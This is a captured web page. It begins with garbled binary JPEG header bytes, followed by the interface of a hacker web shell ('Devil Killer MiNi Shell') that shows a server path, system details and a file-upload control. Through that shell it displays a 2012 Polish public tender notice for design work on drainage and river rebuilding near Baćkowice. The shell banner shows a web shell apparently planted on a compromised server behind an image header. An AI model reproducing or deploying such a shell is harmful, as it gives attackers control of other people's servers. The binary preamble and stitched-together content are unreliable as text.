JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/79773-N-2012.html

<p class="kh_header"><b>Kielce: opracowanie  dokumentacji projektowej pn. Odbudowa urządzeń melioracji wodnych szczegółowych dla obiektów Rudniki i Modliborzyce w zlewni rzeki Modliborki, gm. Baćkowice, woj. świętokrzyskie</b><br>
<b>Numer ogłoszenia: 79773 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie  dokumentacji projektowej pn. Odbudowa urządzeń melioracji wodnych szczegółowych dla obiektów Rudniki i Modliborzyce w zlewni rzeki Modliborki, gm. Baćkowice, woj. świętokrzyskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowej p.n.: Odbudowa urządzeń melioracji wodnych szczegółowych dla obiektów RUDNIKI i MODLIBORZYCE  w zlewni rzeki Modliborki, gm. Baćkowice, woj. świętokrzyskie, uzgodnionej ze wszystkimi stronami i instytucjami, gwarantującej: uzyskanie wymaganych zezwoleń i decyzji na odbudowę urządzeń melioracji wodnych we wsiach: Rudniki i Modliborzyce, gm. Baćkowice, na powierzchni 569,65 ha użytków rolnych, zgodnie z wnioskiem właścicieli gruntów, na podstawie opracowania z 2008 r. p.n.:  Rozpoznanie potrzeb w zakresie odbudowy urządzeń melioracji wodnych szczegółowych, objętych działalnością Gminnej Spółki Wodnej w Baćkowicach, wraz z koncepcją odbudowy, a także przygotowywanie wniosków o uzyskanie stosownych zgód, zezwoleń i decyzji administracyjnych. Wykonawca zobowiązany jest do zapoznania się z powyższym opracowaniem przed złożeniem oferty.
2. Wielkość oraz zakres przedmiotu zamówienia. Uzyskanie, na odpowiedzialność i ryzyko Wykonawcy, wszelkich istotnych informacji, które mogą być konieczne do przygotowania oferty. Wizję lokalną Wykonawca dokona na swój koszt. Zaleca się, aby Wykonawca dokonał wizji w terenie, której termin może uzgodnić z pracownikami ŚZMiUW Oddział Rejonowy w Sandomierzu, nr tel. (15) 833-40-42. Zakres dokumentacji winien obejmować m.in.: odbudowę i remont urządzeń melioracji wodnych szczegółowych na terenie dwóch obiektów: Rudniki i Modliborzyce, wraz z odbudową urządzeń melioracji wodnych podstawowych koniecznych do prawidłowego funkcjonowania obiektów melioracyjnych. Rozwiązania projektowe winny uwzględnić m.in.: odcinkową odbudowę koryta rzeki Modliborki, odcinkową odbudowę koryta rzeki Marcinkówka (Łukawka), odbudowę rowów odpływowych i odwadniających, odbudowę przepustów na rowach, udrożnienie rowów odpływowych, remont wszystkich studzienek drenarskich, zaprojektowanie nowych rowów (jeśli konieczne), wykonanie piętrzenia na rzece Modliborka w celu uzyskania retencji korytowej oraz możliwość gromadzenia wody odpływowej z odwadnianych obiektów - na podstawie opracowania Rozpoznanie potrzeb w zakresie odbudowy urządzeń melioracji wodnych szczegółowych, objętych działalnością Gminnej Spółki Wodnej w Baćkowicach, wraz z koncepcją odbudowy. Przewiduje się następujący zakres prac (wykonanie dokumentacji w zakresie):
a) obiekt Modliborzyce (powierzchnia całego obiektu 200,11 ha, plus 16,4 ha nowego drenowania):
- rzeka Modliborka: odbudowa koryta rzeki na długości 1,65 km (km 8+150 - 9+800), odbudowa przepustów, w km 8+320 rzeki w miejscu niszczonego systematycznie przepustu wykonanie mostu gospodarczego; - rzeka Marcinkówka (Łukawka): odbudowa górnego odcinka rzeki na długości 1,25 km (km 8+400 - 9+650), odbudowa przepustów; - urządzenia melioracji wodnych szczegółowych: odbudowa rowów odpływowych i odwadniających wraz z odbudową przepustów na rowach, remont istniejącej sieci drenowania, wykonanie nowego drenowania na powierzchni 16,4 ha (obszar o nadmiernym uwilgotnieniu); b) obiekt Rudniki (powierzchnia całego obiektu 369,54 ha): - rzeka Modliborka: odbudowa rzeki w km 5+000 - 6+500, w km 5+650 wykonanie mostu gospodarczego dla dojazdu do pól i łąk położonych na lewym brzegu rzeki, wykonanie budowli piętrzącej w km 7+050, która umożliwi retencjonowanie wody w rozszerzonym korycie rzeki wykorzystując naturalne obniżenie w korycie (umożliwi to retencjonowanie w korycie ok. 5 tys. m3 wody na powierzchni 0,25 ha); - urządzenia melioracji wodnych szczegółowych: odbudowa rowów, remont sieci drenowania;
Dokumentacja powinna zostać sporządzona w takim układzie merytorycznym i formalnym aby możliwe było odrębne uzyskanie: - pozwolenia na budowę na realizację robót budowlanych, na które wymagana jest taka decyzja, - zgody na wykonywanie robót budowlanych  wymagających tylko zgłoszenia. Rozmiar robót dla poszczególnych obiektów - zgodnie z Rozpoznaniem - wg załącznika nr 8 do SIWZ.  2.1. W ramach opracowania należy wykonać/uzyskać w szczególności:
1) Projekt budowlany wraz z informacją dotyczącą bezpieczeństwa i ochrony zdrowia. 
Dokumentacja ta powinna zawierać dane hydrologiczne dotyczące obiektu, opis stanu istniejącego (warunki glebowo - wodne), obliczenia hydrologiczne i hydrauliczne, ogólny opis technologii wykonania projektowanych robót itp; 2) Projekt wykonawczy z przedmiarem robót; 3) Materiały do uzyskania decyzji o lokalizacji inwestycji celu publicznego; 4) Pomiar sytuacyjno - wysokościowy wraz z wykonaniem map meliorowanego terenu w skali 1:1000, niezbędnych do uzyskania pozwoleń formalno-prawnych (według zakresu koncepcji); 5) Mapa poglądowa w skali 1:10000; 6) Operat wodnoprawny wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie decyzji o pozwoleniu wodnoprawnym; 7) Materiały do uzyskania decyzji o środowiskowych uwarunkowaniach; 8) Raport o oddziaływaniu przedsięwzięcia na środowisko (jeżeli będzie wymagany); 9) Przygotowanie projektów wniosków o uzyskanie wymaganych decyzji (w tym: decyzja o środowiskowych uwarunkowaniach, decyzja o lokalizacji inwestycji celu publicznego, pozwolenie wodnoprawne i pozwolenie na budowę lub zgłoszenie robót - odpowiednio dla poszczególnych robót); 10) Specyfikacja techniczna wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót; 11) Inwentaryzacja drzew i krzewów umożliwiająca uzyskanie decyzji zezwalającej na usunięcie drzew i krzewów, zgodnie z ustawą o ochronie przyrody (Dz. U. z 2004r. Nr 92, poz. 880). Uzyskanie zgody właścicieli na wycinkę drzew; 12) Kosztorys inwestorski opracowany zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w przedmiarze robót (Dz. U. z 2004r. Nr 130, poz.1389). Kosztorys inwestorski winien być sporządzony metodą kalkulacji szczegółowych; 13) Dokumentacja terenowo - prawna zawierająca: - mapy ewidencyjne w skali 1:5000 obszaru objętego oddziaływaniem inwestycji,
- zestawienie wszystkich właścicieli i powierzchni gruntów, na które wykonane urządzenia korzystnie oddziaływają, w zakresie niezbędnym do ustalenia opłaty inwestycyjnej, zgodnie z obowiązującymi przepisami, - wypisy uproszczone z ewidencji gruntów; 14) Instrukcja eksploatacji i konserwacji urządzeń melioracji wodnych; 15) Uzyskanie wszystkich niezbędnych do realizacji zadania uzgodnień z jednostkami branżowymi. Obowiązkiem Wykonawcy jest przygotowanie stosownych projektów wniosków i materiałów do uzyskania wymaganych opinii, prawomocnych decyzji, sprawdzeń, uzgodnień, zatwierdzeń dokumentacji projektowej wymaganych przepisami prawa, w tym uzgodnienie: ZUD,  z Regionalnym Zarządem Gospodarki Wodnej, z Wojewódzkim Konserwatorem Przyrody, z Wojewódzkim Konserwatorem Zabytków, ze Spółką Wodną w Baćkowicach, z Urzędem Gminy w Baćkowicach dotyczące przeznaczenia gruntów objętych projektem w planie przestrzennego zagospodarowania, ze wszystkimi gestorami urządzeń występujących  w obszarze projektowania i właścicielami nieruchomości gruntowych. Uwagi ogólne: Wykonawca usług projektowych powinien przedstawić rozwiązania projektowe, które zamierza stosować w opracowaniu dokumentacji technicznej, do akceptacji przez Zamawiającego w jego siedzibie (Rada Techniczna), przed przystąpieniem do stosowania ich w pracach projektowych. Zgodnie z art. 20 ust. 2 Prawa budowlanego projektant ma obowiązek zapewnić sprawdzenie projektu architektoniczno-budowlanego pod względem zgodności z przepisami, w tym techniczno - budowlanym i obowiązującymi normami przez osoby posiadające uprawnienia budowlane 
do projektowania bez ograniczeń w odpowiedniej specjalności lub przez rzeczoznawcę budowlanego. 
Zamawiający, tj. Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, oczekuje, 
że zlecone projekty zostaną sprawdzone zgodnie z w/w zasadami, a klauzula (informacja) 
o sprawdzeniu zostanie umieszczona w projekcie. Po przekazaniu Zamawiającemu kompletnej dokumentacji wykonana zostanie opinia (koreferat) odnosząca się do zgodności wykonania w/w dokumentacji ze Specyfikacją Istotnych Warunków Zamówienia, a także z obowiązującymi przepisami, po opracowaniu której zwołane zostanie posiedzenie ZOPI. Ponadto dokumentacja projektowa winna spełniać wymogi formalne dla inwestycji dofinansowanych ze środków unijnych w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013, działanie Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez gospodarowanie rolniczymi zasobami wodnymi. 2.2. Dokumentacje projektowe winny zawierać:
1) projekt budowlany - 6 egzemplarzy;2)	projekt wykonawczy z przedmiarem robót - 6 egzemplarzy; 3)	operat wodnoprawny - 4 egzemplarze; 4)	raport o oddziaływaniu przedsięwzięcia na środowisko  - 4 egzemplarze; 5)	materiały do decyzji o ustaleniu lokalizacji inwestycji celu publicznego -  4 egzemplarze; 6)	materiały do decyzji o środowiskowych uwarunkowaniach - 4 egzemplarze; 7)	specyfikacje techniczne wykonania i odbioru robót budowlanych - 4 egzemplarze;
8) inwentaryzacja zadrzewień - 4 egzemplarze; 9) instrukcja eksploatacji i konserwacji - 4 egzemplarze; 10)	kosztorysy inwestorskie - 2 egzemplarze; 11)	dokumentacja terenowo-prawna - 1 egzemplarz; 12)	Wykonawca zamówienia oprócz wersji papierowej w/w składników dokumentacji projektowej zobowiązany jest przedłożyć Zamawiającemu wersję elektroniczną: 
- część opisowa w postaci plików, które mogą zostać otwarte w edytorach tekstowych i arkuszach kalkulacyjnych (np.: .doc, .xls, .docx, .xlsx); - kosztorysy inwestorskie w wersji umożliwiającej edytowanie ich w programie kosztorysowym (np.: .kst, .ath), - całość opracowania w formacie .pdf.
 Uwaga: Wymaga się, aby każda część składowa (element) dokumentacji projektowych były przedłożone Zamawiającemu w formie jednolitego, trwale spiętego lub zszytego skoroszytu (opracowania). 2.3. Dokumentacje projektowe powinny być sporządzone zgodnie z obowiązującymi przepisami, w szczególności z: 1)	ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. Nr 243 poz. 1623 z 2010r. z późn. zm.), 2)	Ramową Dyrektywą Wodną (Dyrektywa Parlamentu Europejskiego i Rady 2000/60/WE z dnia 23.10.2000 r.), 3)	ustawą z dnia 18 lipca 2001r. Prawo wodne (Dz. U. Nr 239 poz. 2019 z 2005r. ze zm.), 4)	ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. Nr 25 poz. 150 z 2008r.), 5)	ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku  i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008 r. Nr 199 poz. 1227 z późn. zm.),
6) rozporządzeniem Rady Ministrów z dnia 9 listopada 2010r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. Nr 213 poz. 1397),
7) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. nr 130, poz. 1389 z 2004r.),
8) rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133 z 2003r.),
9) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. (Dz. U. Nr 202 poz. 2072 z 2004r. ze zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno -użytkowego.
Dokumentacje projektowe należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna być ona opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć; informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych; Zamawiający wymaga dokonania sprawdzenia dokumentacji projektowej przez osobę posiadającą wymagane uprawnienia; każdy egzemplarz dokumentacji projektowej musi być podpisany przez projektanta i sprawdzającego; ponadto Wykonawca zobowiązany jest do zapoznania mieszkańców terenu objętego projektem z propozycjami rozwiązań projektowych (okazanie projektu). Zgodnie z wymogami Prawa Budowlanego Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego w toku robót budowlanych wykonywanych w oparciu o opracowaną dokumentację projektową. Do obowiązków Wykonawcy w ramach pełnienia przez niego nadzoru autorskiego należeć będzie m.in.: a) nadzór w toku realizacji robót budowlanych nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową; 
b) uzgadnianie z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego; c) uzupełnianie szczegółów dokumentacji projektowej oraz wyjaśnienie wykonawcy robót budowlanych wątpliwości powstałych w toku realizacji robót; d) udział w naradach technicznych; e) potwierdzenie w dokumentacji powykonawczej wszelkich zmian wprowadzonych do dokumentacji projektowej w trakcie realizacji inwestycji; f) inne nie wymienione obowiązki wynikające z obowiązujących przepisów prawa. Zamawiający przewiduje zawarcie odrębnej umowy na nadzór autorski. UWAGA: Zobowiązuje się Wykonawcę do informowania Zamawiającego na bieżąco o postępie prac w realizacji umowy - w formie pisemnej, co najmniej 1 raz w miesiącu.
3. Materiały niezbędne przy opracowaniu przedmiotowej dokumentacji: - Rozpoznanie potrzeb w zakresie odbudowy urządzeń melioracji wodnych szczegółowych, objętych działalnością Gminnej Spółki Wodnej w Baćkowicach, wraz z koncepcją odbudowy - oprac. 2008r.; Z w/w opracowaniem można zapoznać się w ŚZMiUW w Kielcach, ul. Witosa 86 (II piętro, p. 212) 
w dni robocze (poniedziałek - piątek) w godz. 8:00 - 14:00.__ 4. Termin wykonania całego zamówienia: do dnia 14-12-2012 r., (który obejmuje w sobie okres sprawdzenia formalnego - pod względem kompletności przekazanego przez Wykonawcę opracowania w odniesieniu do zapisów SIWZ  ) w tym: a) do dnia 30-11-2012 r. złożenie u Zamawiającego kompletnej dokumentacji wraz z projektami wniosków o: pozwolenie na budowę (dla zakresu robót budowlanych, które będą wymagały uzyskania takiej decyzji), decyzję o środowiskowych uwarunkowaniach, pozwolenie wodno- prawne, decyzję o lokalizacji celu publicznego oraz projektu zgłoszenia robót budowlanych 
(dla zakresu robót które będą wymagały tylko zgłoszenia).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 1 000,00 zł (słownie: tysiąc zł 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca winien dysponować co najmniej jedną osobą na stanowisku projektanta posiadającą uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej i specjalizacji techniczno - budowlanej: budowle hydrotechniczne lub obiekty budowlane melioracji wodnych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, która wykonywała albo sprawdzała minimum: jedną dokumentację projektową z zakresu melioracji wodnych szczegółowych oraz minimum jedną dokumentację projektową z zakresu budowy  (w rozumieniu art. 3 ustawy Prawo budowlane) urządzeń melioracji wodnych podstawowych lub regulacji bądź odbudowy  rzek.
Na potwierdzenie spełnienia powyższych warunków należy złożyć poniższe dokumenty: 2. Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, spełniający wymagania określone w pkt.1  we wzorze stanowiącym załączniki nr 2 do SIWZ wraz z informacją o sposobie dysponowania tymi osobami. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu - oryginał. 3. Do wykazu należy załączyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia wymagane prawem - według wzoru stanowiącego załącznik nr 3 do SIWZ.  Wymagana forma dokumentu - oryginał.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ. Wymagana forma dokumentu - oryginał. 2.	Oświadczenie z art. 36 ust. 4 ustawy we wzorze określonym w załączniku nr 4 do SIWZ. Wymagana forma dokumentu - oryginał.
3. Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w zakresie oferty Wykonawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 4.	Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzielenie zamówienia, o którym mowa w rozdz. IX SIWZ. Forma dokumentu oryginał lub kopia poświadczona notarialnie.
5. W przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć kserokopię umowy spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników lub pełnomocnika ( wspólnika) umocowanego do takiej czynności. Warunek nie ma zastosowania w odniesieniu do spółek jawnych w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru - Krajowego Rejestru Sądowego, jeżeli ujawniono w nim wspólników spółki, oraz sposób reprezentowania spółki (składania oświadczeń woli)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
